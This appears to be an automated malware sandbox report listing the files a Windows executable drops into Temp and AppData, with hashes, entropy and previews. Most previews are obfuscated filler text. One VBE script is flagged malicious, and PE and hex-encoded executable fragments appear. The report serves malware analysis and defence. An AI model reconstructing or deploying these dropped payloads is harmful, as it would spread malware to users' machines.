                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):501
                                                                                            Entropy (8bit):5.617038791939554
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:XR7zPkW2KKil1qnmTxxmYTRGjl5cbidPy:XR3PxKil1a8TRGzcbD
                                                                                            MD5:889B62021E2A267B499B25A0C53E23D5
                                                                                            SHA1:4D9B7DD624DF58254290942182D07417BEDAC373
                                                                                            SHA-256:A0156B9ED9271943F1748BDD4166E9617AB3190B4A2EE9F70149AA1E956D2849
                                                                                            SHA-512:9F3FD07B7C09AE15A77AD1FB95D354B8F60F9ACD8F3122077B67AD344BC7C820849F3F4C816F6D3CD569B0ED98866A7C89C54A4B2A218FF30B48A2903C8FBB75
                                                                                            Malicious:false
                                                                                            Preview:f4G77efxXR4E87hV515581ABH7aC2B0w6r88BkgN94k41H1946342114LiIu330P13..BorderConstants ButtonConstants..Il463uL43z95i2QU6K5JLxf0lqyvO7SwY9p93525PVOID90vl2wA0c4lG624F01701lXnlDWl0pEB3h129cgSBe87K53fwX5hmsG9254..ToolTipConstants UpDownConstants..TIe6zbM6nd6B2AP828217y0b4q8Ou4F52CMK3CeYy9DZ6dvAXH68AbAO7223553OK3I74ka8p53o5b05511SU5p0U5ACt2788E8o1F142X9J1J18ZP88z490j06jdsXg3678Q3pSdkaF79..FileConstants FileConstants..14quI541qcR2t8Ow6J9n96vDH637v2Oi9iR2951W982xtkE803A..TreeViewConstants ColorConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\rfxsxmmcd.3gp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):609
                                                                                            Entropy (8bit):5.6077218194238485
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:fU3y1RmqSUaQcBFPIrrUXI5DNpG4XoXgADqe9Rc:fmybmqt6CrrR53NAme3c
                                                                                            MD5:956687CC1E8733BEF44FFE9CF4697121
                                                                                            SHA1:96F4E58C2B8EEA24D9A44E1DE65DF536BC4CF4CE
                                                                                            SHA-256:A730F62C59974CD502EBA3347A48BA16D543360E0D5A45517B881D01F175928F
                                                                                            SHA-512:0A4B15A9C0B2EDD77FDDB971F622EFB0AA08F594F6810286DE9533EC4606CDB5F8DD53B0EB22387F79F1FBFF8FCDBCFA1FA6E2318445AAE3A37C790AC3DD4EA4
                                                                                            Malicious:false
                                                                                            Preview:2864PS6986KPLkp1ilW433d4Y7N1K5GKVy230jJ5c00J1RAM30Z1904847S53z4S2YLld52BNuX0..StructureConstants GuiDateTimePicker..8d48MY55n1K0eis7Cm46R378X3wdiu3k30KTt44H4820gas09F96I50l1d938HlTH91pabj66NdzLqw36d62285Ti58sfa35a63pu72E614RU5o66PQ6qdv8..TreeViewConstants BorderConstants..R25OLm057275zAc1p089F6OD9kr3E43hauL1BF185b81517C1X1N19FhoVvG6tL0PIS1f15GS4I9P22QqIMz60R1B4578G002Vf..BorderConstants DateTimeConstants..O3s0864M1x74D84ZiZ0ut21Y7pkB14J66U6T9R124M85C542V04090R27tsHHt48E94z97lpf21G8QLe7Z13B0768gpkg6A5r1kj0YX9v2rQIS7B422A91oq1X8i4263b6g6P25728Tj60x23g5XLaucNNx1888..StructureConstants StructureConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\rklpmssjnu.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):600
                                                                                            Entropy (8bit):5.561353751432372
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:j5TPQ1R+j5AcXYBTIuWExlTXJPiiwXvZX5a9IKfs1m+wwI3C+yVrIcWUkanb3xbi:lT4uWckx7diiivZXUcm+iC+vUnprumu
                                                                                            MD5:FB4306A9FD5785223D3F4F3BF7031170
                                                                                            SHA1:69DFA4A52E7408BAD2DDB8B274ACC189CA00936F
                                                                                            SHA-256:565049A3EEC63122D5D1B18A7B9BB23B105588E64AD746B9898CEC1896117BC1
                                                                                            SHA-512:C5C33C8D9E6F941582764B099DB7F74D74D3302817A7A65841544EAAF42D6F526456EAFBD68170B885FA51FD4EA494F5C0E8557CC563F1B20FC6B16042DC6EE9
                                                                                            Malicious:false
                                                                                            Preview:4m7Qe3VC9Ky86q36673k56eEXJm1M3u6W8..FontConstants ToolbarConstants..F1XSHeQ263..FontConstants FileConstants..2126g9267WzF7mH0069O8706x2IKP..UpDownConstants UpDownConstants..8q246ToIE648AJL9h3D10Z9GbV1vH8lW4x444JRw6s5I4F5k30iOZ6D0is7A447Bb91h24y92635m9YA3j8113h79V5f7669H87tku8J3VI520Gm8Z0orGrE779B1RT86292vwg8wwd0wj18pyaqmohWb8..FontConstants FontConstants..hD981se5s301z3w796UjT8Wrj593802F0mG545I4C36e3z4lP8rG2e09sOT9bQjV59Y16d5K4598gK72Lk26q1YzK6z3334D63Pdwl..StructureConstants FontConstants..AKrcW5s4qY2VUy7fy7S6244g5X3yk11151v0Sru6724INVU1e08h2u78JSaE2RC5lcGOu..ComboConstants ToolTipConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\subbjsug.icm

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):604
                                                                                            Entropy (8bit):5.55083826124397
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:IcctRm2VE6dGhRq+hjolYFztVDlR0K01Pe5CbSYFoti:chVE6dGfq+rdnlR0KjnYF6i
                                                                                            MD5:8956858CB0E9C18B4868F43F4031F59E
                                                                                            SHA1:EF75A237FC571B5BD7878177E93B3D80D1E115D7
                                                                                            SHA-256:412BFE4F21EE7731B9A2D80289A42C3F30E697EA6C8C9B84D80812B6F7AE0ED7
                                                                                            SHA-512:408A21F95BF7DF423ACA9385E21CDB23501B28011EB17B5E4773ED5E2585D10F14C03AF683CECADCD4C734EE759729E90D0DF6216781B679B78AC2D10B442F75
                                                                                            Malicious:false
                                                                                            Preview:14y4X6fTF9bt137sK0W404ygZ30pJ7R891w65U8IUID9J2Y95MH48H3k7m740..ComboConstants ComboConstants..K0MU95326g5..ComboConstants ToolbarConstants..I2H368vOkC9010G64Jc72az1UgyMJ8s67eYWg2PIHD8e9v397a97dhv3dU1R7Re4Z4I934nL0f4IZ1405M1n652qt..ButtonConstants ToolTipConstants..5Yh77e050A08086e666oWT3K3GSCs37B1491R35x4fUcQ39h15fV0PaZ5m676kUm4kK4Jr60F92HyZ77845S3d3lNnou48Q6QCi98i994579xK83JVivq7..ComboConstants DateTimeConstants..c4FkyF5c6cbq2D8C53c41g096Qv2Mm523A4177PK1dy34r03Ij1CK0dhV7Yi9TTJAM3OLrj328O31TkNO5T5ub6Z160t0ke9R48L1HQj7fx5601m605C5Ek0e47vjpp9yJ97a5985008Nt9DV93w88b..ComboConstants UpDownConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\tbkgx.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):523
                                                                                            Entropy (8bit):5.5433905765244615
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ecNcjfSBPgENRfcFJ9Xj6tvNBtuQq0bIBjP2R:ecdrnKCvN5qMIIR
                                                                                            MD5:2CB1A9030FF973BB16FD0E743D1711C2
                                                                                            SHA1:10D59F3482D85436651F94C205E22479B65B1E2F
                                                                                            SHA-256:D535D2FD3FD07C2153AFDA33FF492BEE0B859927D55D349B6C7758DEF26CBB42
                                                                                            SHA-512:68EC97E03CC744107E4FEF25893DCEB89A28D42B40CA44554BC5E067ADF09E4843D0AD835BC884D3C525ACFDAAF5CDBF020D72A5F333B708D73C0FA01FDC1F15
                                                                                            Malicious:false
                                                                                            Preview:R7W7oi16Z190KI8q1937JR65wPIM2688E7e4Uc3V8u15da08A3z6wu9d3caxj8330YT..ComboConstants TreeViewConstants..4NM6m07K14..ButtonConstants StructureConstants..slaF1At1mZn743m7O191E954Q0053194KJto51XFf5RN7791m46J02DgXU481qHI8krhM326mp5iI5288169H1o1YWDWE6iYhM0Oq03Of30eTK8059ybj3q211LpH0Qt9u1c5959k6WC0B87MK611PEhg5jD142b..FileConstants ColorConstants..23AFpl6wZC3uwN257S6Xy14m76W8k16..StructureConstants GuiDateTimePicker..w360P76k86ep942ObxF1y7IVz2S..StructureConstants BorderConstants..U5648n..TreeViewConstants ToolbarConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (392), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):94814
                                                                                            Entropy (8bit):3.0148514611543757
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:D////////////////////7HK////////////////////aQ/////////////////G:nHW9I5UIHh
                                                                                            MD5:9F66BDFD750000E306B9C3504B6BF382
                                                                                            SHA1:EEF56276E2A5A2C2D10628277A622E9898FD85EF
                                                                                            SHA-256:17F34305C6B54964D2D2944B617B3DECD1434A627C96CF65B3250CDA4AA9EFD2
                                                                                            SHA-512:A9CBFFA5D4D9907062A0AF2B6B21D32531C4C80D6BDD8FC5B9B997AD560BECB5F5286BF044F5CA8F7088E520E6E2028DC1A07218808BB8D5B00296D0D18344BF
                                                                                            Malicious:true
                                                                                            Preview:..T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.T.e.l.e.V.r.a.m.(.2.2.3.).:.....T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.(.6.7.).:.T.e.l.e.V.r.a.m.

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\ttuxwtpb.xl

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.419302921343066
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:aRJu0NCfDCRiy+k5VRjP2WzkuxVLl9k2ZJ:aDuoCuEyb5zeSk+ll9RJ
                                                                                            MD5:C61D3A184A0466FD013ECACEC38B0020
                                                                                            SHA1:12CDD1B12D296EA3A9CE6F0F1C4B15F2900E8DEA
                                                                                            SHA-256:FD4C4B681CB631A55C393819946326033C002EA1F1DE0886D61024348B98E28D
                                                                                            SHA-512:F87933ABEDEA583C212F34EC95349F53F692CEEF200CD577B65EF1C39EDB554C66D19C382228F8454BE52BE7ADAFCAE747EF1ED07DA20A59AEE682A038132C2F
                                                                                            Malicious:false
                                                                                            Preview:6NC28o7H9j16RM750o83m3884wd12o490f7..StructureConstants UpDownConstants..00TZOwQG9o1MFb84Pf0..ButtonConstants FontConstants..2Dw5T07RkT9HoJ4tZ4533354G1F0zNXg98h015AbV69Qrt8708XKe..ButtonConstants DateTimeConstants..9XX5w22Tv2lS5a6839s8X0810R89Xz096u7o526y8432aiX921XU9268XQ7s..UpDownConstants ColorConstants..5wtB6713CTj2528fK63o5fP16hl0bh62H19a3b56178M25IP4W4RNj68B8k51o418xOK4K74udc55p0W5yw6rTaNE2sXvN8a028t4C79kAjlM0ai280Ls0oe093176MUan207sT7Cu3EPgwq919X9YMO3N67446GVz9C..DateTimeConstants FontConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vbepwhj.mp3

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):125535210
                                                                                            Entropy (8bit):7.10415179033749
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:dd/dMdYdqdud4d/dwdtd3dQdAdWdwdpdrd3dUdGdddCdgdldxdTdHd0dvdGdpdvx:5
                                                                                            MD5:6C0B2E90C88041FF7019A13FDBBA5502
                                                                                            SHA1:70B5811313AA4B31E3A2A8FB485FDCAB27C0D52E
                                                                                            SHA-256:5D91FB4BD2F8530F67EB4A43262EFA75273A8A47118D104DD2140A4092B5A6DD
                                                                                            SHA-512:3A95F6D854A7A3DC91C10E4B4B3A0BF3443347D9E34B8ABC55CFE64E96CDE64EE09F512EAB1C6321289FAFF175BC7BD1F78085D2AB41162733E9FB28CF0DF2A8
                                                                                            Malicious:false
                                                                                            Preview:..;.B...+.2tfT.;.a.....\:..|:s..23!....V&.......d.}..(.A..e...).....P.w%|a?-.C7..]...U...!..W.%.J.V.8a..F...+F.g...H.nN@....e.+..yq..5...M.Z@.x......|.T.*.....2..#......#.c.s.[P...6........D=.."..B.e.#1.e....f...g..x.....t.:C..{.......s.8!(......N$'.>;tI|.D..=..z..K..._...j,......&...........RFG..$./.....M..w........N/.uU@.....5.4.8.i.4.9.6.Q.9.c.L.9.f.4.W.6.4.z.....S..T..F..c9h..0.....zrVO....E.+.#'7.....c..3k<g.:...M..Hu..... .......c.."M.........^..R....+..h.....8...G.\r......Y.?...4p...|J...Q........}...0ca..g>...V+.D(..kPV.....-=z..F}.a}T..*.......T>*..3/~..$...Bb.e....W....w.u.S..k.-..>v....H..Wo.P.C.].[k.s=.......l...._F@e.V...*.R..CB.d..3?.r..........q.?..fp).KZJ.|.N.....(oo.y.O.1_..*\...T..C...\..`%.....#[W.>......u...B....h7.....<..#..X.!]....h..x.6..\...5.Y...<......4.s.H.5.m.2.7.d.Z.H.9.z.3.9.1.W.9.q.f.0.0.4.I.8.7........3..&..5B.\'...5U.`.\..Y..$..:.W{.xTD..z...../.....W.....v.KN.;..(bc.-..2.F....$`.7.P>.......?.<.k..[..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vldrkjskmt.txt

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):507
                                                                                            Entropy (8bit):5.602136112671
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:C8riOYQScYnJNsuSx+OoxgjCDyyBoUj4/Snm4FdPcamz4PPUwAG0oxMN6N/Y6LUp:CO9Sc8suNxxUS0fSdPEKswnFxI8Nxs
                                                                                            MD5:C3034A15D775CAB046D7756E88C7FC1A
                                                                                            SHA1:D9A711189FAEEB8F4589AE62E5EB75BDF15ACD04
                                                                                            SHA-256:7EBD5255F7CF791045BF8FFC387C7FBCCCF57F60FB7F04280B56BE65A723C930
                                                                                            SHA-512:B154A3D50390C318EACF24260A4BCCA78288442505CB8BEBFA683E205161BE0A3438D3E44ACE97F01775C357C439CB5FE037D5AB6CECA66B05118413DEC190A4
                                                                                            Malicious:false
                                                                                            Preview:H3A1Cb10529Bc5Ij711u265q302j7zv815H2iQ3Tg932H55AN13x08pI17D04RaZ651yPuaD7SPW1oIe85yazKKe4KI599o740ie0g9w7803KY6H5Tq54FxfH4y0f36737g3XgW27..GuiDateTimePicker ButtonConstants..S3L9D7gY8dAr346do10x1ltt53C2R754f9eyeU231CFm30PK8z99f08V7T50ut00ucI7dBy375xrF3eU5DTIH1QzA558t6V49638NZe71KA9Nh..GuiDateTimePicker ToolbarConstants..7S1je7CDzs77788w4297W7BMcb3x75Wb3kCGL7wEs5i2uGNSz58I38jhq33q657m02654T2l99th5PPj9lP0vY41q7w6P488K41G5z46Rrw9b81711YdX5n94Fw801at0O03IQCmFb77CT8Wxj7U244R..ComboConstants ColorConstants..

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vrhk.mp3

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):565
                                                                                            Entropy (8bit):5.560109550665888
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:5JqQSmuhfYECN1KsYXzckOGNJNoaB2gT1vMR:7qIrN11YNOGNJNoaB24FMR
                                                                                            MD5:1A4B5F34A030C342815A5D774D016639
                                                                                            SHA1:803A73F0FAF9F6651A2B674E3773AB899991033F
                                                                                            SHA-256:7F7CA6630552C360096456892184D04ACC7CA272080FFAF53D8EC6AB256ABBB7
                                                                                            SHA-512:2D7A3624500366867CDEAA3AEE91760B48B91A34C6F9FBB4160FA6BF268BD3F506994626E3599970A1B0179E7BDE5C449C45CD9FFC3F154E403FAFAC60A964F2
                                                                                            Malicious:false
                                                                                            Preview:2t48VtfoQQp73UW77v8oN884r74M26m5y54A5kD3g9G142p4IV45538751u67z695155029j8841259751Jd0699E9NIl2fbO2nfsx6cSx01njp7Ep8FMz7y5Kf836..DateTimeConstants ButtonConstants..D907ktUHx10s1K93eDgQ6C99m198UDJ08GrfnP49Y1rKbGjt5jxyJz6kfNP30R68212kQ2904E1i5S853f2G7g8cUu7..ColorConstants ToolbarConstants..q2g4VZx8xsHPMTwQ7529O9YQ82628HB9f1Fck2dKs17214Q507Q7mDh9o60V49L68jH723s7X55F8X65UQ7089MQVB9K102BpgE4Uo35UQw2441945H12o9M4118xO83..UpDownConstants ToolbarConstants..i5R8H6wI35V8b5q9YFQk3Jsm2TuCaOvgSs71g12mLRym3Ycl9O35s7Q8sA9071BeV30jF0J3Mb7..ToolTipConstants ToolbarConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.629681466265794
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.629681466265794
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\uhex\chvouie.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):581
                                                                                            Entropy (8bit):5.546344133050769
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:C1n/QXD8BPj1O6VIi/KFgy1U4Xkkc4Le4mHv/I0:C1n/A8l1pgH1U4X5nVWI0
                                                                                            MD5:D4FDDB7B95EF320260853D7EE5054AD6
                                                                                            SHA1:933D6B276C32F17204B3A313823B21AFAB6842AE
                                                                                            SHA-256:82367D1FDC82F802F695E38C00D5E644D31FD949EF2FE327A0AEFC1199C67712
                                                                                            SHA-512:BB62A3F48C9D47A69B525A0E067B60AA3BC4B6DF4DD6BA3C7C0E8851E142B4210CD8213122164FE81A13D8EB7A6B75CC9C6B7E63375C2C3C0E3B3C93BF7E06EE
                                                                                            Malicious:false
                                                                                            Preview:8j88PMn13k9C73521a9W2II0r4xX52mlQcJy26e87tT08Ap98742M9o5X8G85Tdg960J6r0y0WHtR518Lj7..ColorConstants TreeViewConstants..G2947PBFqf6j6M7G6Pocsj100aS6S99V562XKh6dLu17u6852vuMQTIVQ69FA80j7aP86u120qKG94n..ToolTipConstants ComboConstants..qh8eF160D185L400U7Ct36UY5i8U7121Osv375rO7yR9YofX85rPj1H5968OK04610jtVFr60no1321A0j7ctPMkB766..ColorConstants BorderConstants..j7Y74m2532509Za26s0Rcr34V9LI8w99Yb77559022f2Um0vNLG93TLSaRv304pi9RfRkuZqg1222u4p6Qb79l4Hy1..UpDownConstants ColorConstants..Be54946v9X8ESc3P358Dhc6Z377523px1D63f9923RPoE9uR7e9249D3K9sF..StructureConstants BorderConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\cqrwlhw.sel

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):567839
                                                                                            Entropy (8bit):4.048600444460266
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:K852spk1uP3qTW0l5s9qLIZWCOoDNAGERKEo4AaDYur1aL52/WFO:znaE6Ffs9PoCOTGZO15aLoOA
                                                                                            MD5:70C94472C2B94B631D476EE09724D49D
                                                                                            SHA1:7038CBC08B91B66D8E180FD9B4653FBB01097972
                                                                                            SHA-256:A27623E45A527D89A07D3B0A1B32CC510A77BFDBDED6EE9BEA24C0D8CCC8D64E
                                                                                            SHA-512:4AA84EE61631EFEE0967F572F53BE8BFF84DA20A6C86220FC5B6CF5DDFB12EDAF958403315B0AE008E2335533FBB5A5BE296292C908E444BDC49145B632E629A
                                                                                            Malicious:false
                                                                                            Preview:0x4D5*4552E8]]]]5883E8098_C883C03C8_]03C/83C0280308FFE/9]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]8*738C57]]]]]]]]E]]20/0_0/0_]]5204]]]]]]]]]C0/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]945/04]]/]]]05204]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                                                            C:\Users\user\AppData\Roaming\uhex\dlbpa.docx

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):31214
                                                                                            Entropy (8bit):5.571170220741757
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RJWZXrOy88UE/douU4zvmsJAmYxHxejMJ8vlU:21f88UbnDsJ2SjpC
                                                                                            MD5:6B58B68859E25C88D3235AADEA10A15F
                                                                                            SHA1:6FF08E2010F8A6D635FA6E365FAB0098B68F470B
                                                                                            SHA-256:BBEF0EF89BFA3A3BAE0452A71B64BB46B217F7CCACB2CD79FB466C13B6BA4631
                                                                                            SHA-512:6B2B24AF543CFF19ACC37261C3DE00459D8BD66720A9D3E48265DEF903E87CBDD8F7415D09070FAB3C2345C0BC3769A13F156E7EAC4CF2FF4AEDC15A6EB488C6
                                                                                            Malicious:false
